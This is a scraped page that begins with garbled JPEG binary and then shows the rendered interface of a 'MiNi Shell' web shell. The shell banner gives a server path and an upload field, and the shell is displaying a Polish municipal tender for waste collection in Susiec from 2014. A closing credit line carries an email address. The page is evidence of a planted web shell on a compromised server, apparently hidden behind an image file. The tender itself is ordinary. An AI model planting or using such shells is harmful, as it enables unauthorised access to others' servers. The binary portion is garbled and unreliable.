JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141118/239565-N-2014.html

<p class="kh_header"><b>Susiec: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Susiec</b><br>
<b>Numer ogłoszenia: 239565 - 2014; data zamieszczenia: 18.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Susiec , ul. Tomaszowska 2, 22-672 Susiec, woj. lubelskie, tel. 084 6654868, faks 084 6654893.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugsusiec.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Susiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi związanej z Odbiorem i zagospodarowaniem odpadów komunalnych z terenu gminy Susiec w zakresie według poniższego opisu:  
Przedmiotem zamówienia  jest odbiór i zagospodarowanie odpadów komunalnych 
z terenu gminy Susiec o okresie od 01 stycznia 2015 r. do 31 grudnia 2016 r.. 
Charakterystyka gminy Susiec:
1.Powierzchnia gminy Susiec - 190,52 km. 2
2.Liczba miejscowości - 19
3.Liczba sołectw - 21
4.Liczba mieszkańców stałych na dzień 31 grudnia 2013 r. -8 033 mieszkańców  zamieszkałych w zabudowie jednorodzinnej.
5.Liczba nieruchomości od których odbierane są odpady komunalne ogółem   -  2009
w tym:
1) nieruchomości zamieszkałych - 1858
2) nieruchomości niezamieszkałe na których powstają odpady komunalne - 151
-co wynika z poniższego zestawienia: 
Lp	Nazwa Miejscowości -Liczba nieruchomości zamieszkałych-	Liczba nieruchomości niezamieszkałych na których powstają odpady komunalne
1.Ciotusza Nowa-	112	-4
2.Ciotusza Stara-	69-	3
3.Grabowica-	94-	4
4.Huta Szumy-	60-	8
5.Kunki- 	99-	3
6.Łasochy-	22-	0
7.Łosiniec-	145-	10
8.Łuszczacz-96-	3
9.Majdan Sopocki Pierwszy-	132-	14
10.Majdan Sopocki Drugi-	126-	14
11.Maziły-	47-	2
12.Nowiny-	62-	7
13.Oseredek-	125-	7
14.Paary	-137-	13
15.Róża	-40-	1
16.Rybnica-	57-	4
17.Susiec-	329-	47
18.Wółka Łosiniecka- 	82-	6
18.Zawadki -	24-	1
Razem:	-1858-	151
6.Orientacyjna długość trasy przejazdu śmieciarki w skali miesiąca ok. 560 km. 
7. Na terenie gminy Susiec obowiązywać będzie system mieszany workowo-pojemnikowy zbiórki odpadów komunalnych. 
Niesegregowane (zmieszane) odpady komunalne (kod: 20 03 01) będą gromadzone 
w pojemnikach 120 l. Pojemniki zabezpiecza Wykonawca na własny koszt i ustawi je 
w miejscach wskazanych przez właścicieli nieruchomości. poszczególnych   
nieruchomości. 
8.Wymogi dotyczące przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów komunalnych:
1)Wykonawca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany do przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów.
2)Odpady, których nie udało się podać odzyskowi powinny być tak unieszkodliwiane aby składowane były wyłącznie te, których unieszkodliwienie w inny sposób było niemożliwe z przyczyn technologicznych lub nieuzasadnione z przyczyn ekologicznych lub ekonomicznych.
3)Wykonawca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany do przekazywania do regionalnej instalacji do przetwarzania odpadów komunalnych jedynie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania.
4)Zakazuje się mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odebranymi od właścicieli nieruchomości.
5)Wykonawca odbierający odpady komunalne, w przypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, przyjmuje je jako zmieszane odpady komunalne i powiadamia o tym Gminę. 
9. Rodzaje i ilość odpadów komunalnych odbieranych selektywnie od właścicieli 
            nieruchomości z terenu gminu Susiec w skali roku:
1) papier i tektura - ok. 5 Mg,
2) metale - ok. 2 Mg,
3) tworzywa sztuczne i wielomateriałowe - ok. 30 Mg,
4) szkło opakowaniowe bezbarwne i kolorowe - ok. 70 Mg,
5) przeterminowane leki i chemikalia - wg potrzeb,
6) meble i odpady wielkogabarytowe - wg potrzeb,
7) zużyte baterie i akumulatory - wg potrzeb
8) zużyty sprzęt elektryczny i elektroniczny - ok.7 Mg
9) zużyte opony - ok. 40 Mg,
10) odpady budowlane i rozbiórkowe - wg potrzeb
11) odpady ulegające biodegradacji - wg potrzeb.
10. Charakterystyka worków do selektywnej zbiorki odpadów:
1) materiał: folia polietylenowa LDPE,
2) pojemność: -120 l. 
3) kolor: żółty, niebieski, zielony i czarny.
4) grubość: min 0,06 mm.
11. Liczba i rodzaj pojemników do gromadzenia odpadów zmieszanych:
1) pojemniki o pojemności 120 l. - maks. 1 858 szt.
2) pojemniki o pojemności 80 l. - maks. 151 szt. 
12. Liczba worków do selektywnej zbiórki odpadów:
1) żółte (opakowania z tworzyw sztucznych) - ok. 12 000 szt. 
2) niebieskie (papier i tektura)  -  ok. 8 000 szt.
3) zielone (opakowania ze szkła)  - ok. 10 000 szt. 
4) czarne (opakowania z metali)  - ok. 6 000 szt. 
13. Zaopatrzeniem w pojemniki do odbioru niesegregowanych (zmieszanych) odpadów komunalnych oraz w odpowiednie worki  do zbierania selektywnie zebranych odpadów   komunalnych zajmie się firma wyłoniona przez Gminę w drodze przetargu.	
Zaopatrzenie w pojemniki i worki może nastąpić poprzez:
1) Wydzierżawienie  przez wykonawcę usługi;
2) Użyczenie przez wykonawcę usługi.
Ilość wytwarzanych odpadów komunalnych na terenie gminy Susiec nie jest zależna od Zamawiającego. Szacunkowa ilość odpadów przewidzianych do zbiórki i transportu wynosi ok. 500 Mg co wynika ze sprawozdań za 2013 rok. W/w ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb. 
14. Obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem:
1)  Wykonawca będzie dostarczać Zamawiającemu raz na kwartał sprawozdanie z ilości odebranych i poddanych unieszkodliwianiu odpadów  zgodnie z obowiązującymi w tym zakresie przepisami. W terminie składania pierwszego sprawozdania Wykonawca  przekaże Zamawiającemu wykaz wszystkich posesji od których zostały odebrane   odpady komunalne, wraz ze wskazaniem  ilości pojemników. 
2)  Wykonawca zobowiązany jest do udokumentowania  osiąganych poziomów recyklingu      w szczególności następujących frakcji odpadów komunalnych:  papieru, metali,    tworzyw sztucznych  i szkła oraz osiąganego poziomu ograniczenia  masy odpadów  komunalnych ulegających biodegradacji przekazywanych do składowania w wysokości  określonej w przepisach rozporządzenia  Ministra Środowiska z dnia 29 maja 2012 r.  w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku     innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645). 
3) Wykonawca jeden raz w kwartale przekazuje Zamawiającemu informację o ilości 
         zebranych na terenie gminy Susiec odpadów  komunalnych  zbieranych selektywnie   oraz niesegregowanych (zmieszanych) odpadów  komunalnych. 
4) Wykonawca jeden raz w kwartale przekaże Zamawiającemu wykaz zamieszkałych    nieruchomości gminy Susiec oraz  wykaz właścicieli nieruchomości, na których nie  zamieszkują na stałe mieszkańcy ale powstają odpady komunalne (działki rekreacyjne, osoby prowadzące działalność gospodarczą), którzy nie segregują odpadów  komunalnych oraz wykaz  nieruchomości, od których zaprzestano odbierać odpady    komunalne. 
5) Wraz ze sprawozdaniem  kwartalnym Wykonawca dostarczy Zamawiającemu kopie  dowodów dostarczenia odpadów do instalacji odzysku lub unieszkodliwiania tj. karty  ewidencji odpadów lub karty przekazania odpadów.  
15. Szczegółowe wymagania stawiane przedsiębiorcom odbierającym odpady komunalne od  właścicieli nieruchomości:
1) Wykonawca zobowiązany jest spełniać warunki określone w Rozporządzeniu Ministra     Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie   odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r.,    poz. 122) między innymi:
a) posiadać bazę magazynowo transportową usytuowaną na terenie gminy Susiec lub 
    w  odległości nie większej niż 60 km od granicy gminy Susiec, do którego posiada tytuł prawny.                                                                                                        Baza magazynowo - transportowa musi spełniać następujące warunki:
- teren bazy magazynowo - transportowej musi być zabezpieczony w sposób 
uniemożliwiający wstęp osobom nieupoważnionym,
- miejsca przeznaczone do parkowania pojazdów muszą być zabezpieczone przed emisją  zanieczyszczeń do gruntu,
- miejsce magazynowania selektywnie zbieranych odpadów komunalnych musi być   
   zabezpieczone przed emisja zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem   czynników atmosferycznych,
- teren bazy musi być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie  wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie    z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne 
   (Dz. U. z 2012 r. poz. 145, 951 i 1513  oraz z 2013 r. poz. 21). 				
b) baza magazynowo - transportowa powinna być wyposażona w: 
- miejsca przeznaczone do parkowania pojazdów,
- pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
- miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów  komunalnych,                                                                                                  - legalizowaną samochodową wagę najazdową - w przypadku gdy na ternie bazy następuje   magazynowanie odpadów.
c) na terenie bazy magazynowo - transportowej powinny znajdować się także: 
- punkt bieżącej konserwacji i napraw pojazdów,
- miejsce do mycia i dezynfekcji pojazdów.
d) na terenie bazy magazynowo - transportowej muszą znajdować się urządzenia do 
    selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania.                                                                                               2) Wykonawca zobowiązany jest posiadać co najmniej dwa pojazdy przystosowane do  odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy 
 przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co    najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
 Pojazdy muszą spełniać następujące warunki:
a) posiadać trwałe i czytelne oznakowanie w widocznym miejscu nazwą firmy oraz z danymi   adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli   nieruchomości, 
b) być zarejestrowane i dopuszczone do ruchu oraz posiadać aktualne badania techniczne    i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym,
c) być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po 
   opróżnieniu pojemników,  
d) konstrukcja pojazdów musi zabezpieczać przed niekontrolowanym wydostawaniem na    zewnątrz odpadów podczas magazynowania, przeładunku a także transportu oraz minimalizować oddziaływanie czynników atmosferycznych na odpady.
16. Standard sanitarny wykonywania usług oraz ochrony środowiska:
 Wykonawca obowiązany jest utrzymywać odpowiedni stan sanitarny pojazdów i urządzeń     poprzez wykonywanie następujących czynności: 
1) mycie i dezynfekcję z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż 1 raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie. 
2) opróżnianie pojazdów z odpadów i parkowanie na koniec każdego dnia roboczego 
 wyłącznie na terenie bazy magazynowo- transportowej,
3) dopuszcza się wyposażenie pojazdów w urządzenia do ważenia odpadów komunalnych. 
17. Zakazuje się Wykonawcy mieszania selektywnie zebranych odpadów komunalnych    z  niesegregowanymi (zmieszanymi) odpadami komunalnymi zebranymi z terenu gminy Susiec. 
18. Wykonawca ma obowiązek  na własny koszt wyposażenia właścicieli wszystkich 
 nieruchomości objętych zbiórką  odpadów  w pojemniki  i worki niezbędne do 
 gromadzenia odpadów segregowanych przed pierwszym dniem obowiązywania umowy     na odbiór odpadów zawartej z Zamawiającym. 
19. Wykonawca ma obowiązek odbioru wszystkich odpadów komunalnych segregowanych     i niesegregowanych (zmieszanych) odpadów  komunalnych. Ilość niesegregowanych      (zmieszanych)odpadów komunalnych szacuje się na i około 400 Mg w skali roku.
20. Wykonawca przed podpisaniem umowy wskaże Zamawiającemu  nazwę, rodzaj  i adres      instalacji do której będą dostarczane odebrane z terenu gminy Susiec odpady komunalne. 
21. Wykonawca zobowiązany jest do udokumentowania  osiąganych poziomów recyklingu  w szczególności następujących frakcji odpadów komunalnych:  papieru, metali,  tworzyw sztucznych  i szkła oraz osiąganego poziomu ograniczenia  masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania w wysokości     określonej w przepisach Rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r.    w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku     innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645).
22.Wynagrodzenie będzie rewaloryzowane od dnia 1 stycznia 2016 roku o wskaźnik wzrostu cen towarów i usług konsumpcyjnych podany przez GUS za 3 pierwsze kwartały 2015 roku do analogicznego okresu roku poprzedniego - do celów określonych w ustawie o podatkach i opłatach lokalnych ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-0, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie żądał zabezpieczenia oferty kwotą wadium w wysokości 10 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku jak wyżej , jeżeli Wykonawca posiada:
1.Aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w Gminie Susiec, zgodnie z art. 9c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach(t.j. Dz.U. z 2012r., poz. 391).
2.Aktualne zezwolenie na zbieranie odpadów oraz transport odpadów zgodnie z art. 41 ust. 3 pkt. 2 i art. 233 ust. 3 ustawy z dnia 14 grudnia 2012r. o odpadach (Dz.U. z 2013r. poz. 21).
Spełnienie warunku udziału - na podstawie złożonych dokumentów w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
2.Wprowadzenie zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności usprawnienia procesu realizacji zamówienia.
3.W zakresie sposobu realizacji zamówienia przez Wykonawcę świadczenia odbierania i zagospodarowania odpadów w przypadku zmiany przepisów prawa w tym zakresie.
4.Zmiany oczywistych omyłek pisarskich, rachunkowych i siedziby firmy.
5.Zamiany wynagrodzenia - wynagrodzenie będzie rewaloryzowane od dnia 1 stycznia 2016 roku o wskaźnik wzrostu cen towarów i usług konsumpcyjnych podany przez GUS za 3 pierwsze kwartały 2015 roku do analogicznego okresu roku poprzedniego - do celów określonych w ustawie o podatkach i opłatach lokalnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugsusiec.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Susiec, ul. Tomaszowska 2, 22-672 Susiec, pokój nr 9. Cena SIWZ w wersji papierowej 20,00 zł netto..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2014 godzina 10:00, miejsce: Urząd Gminy Susiec, ul. Tomaszowska 2 , 22-672 Susiec, pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com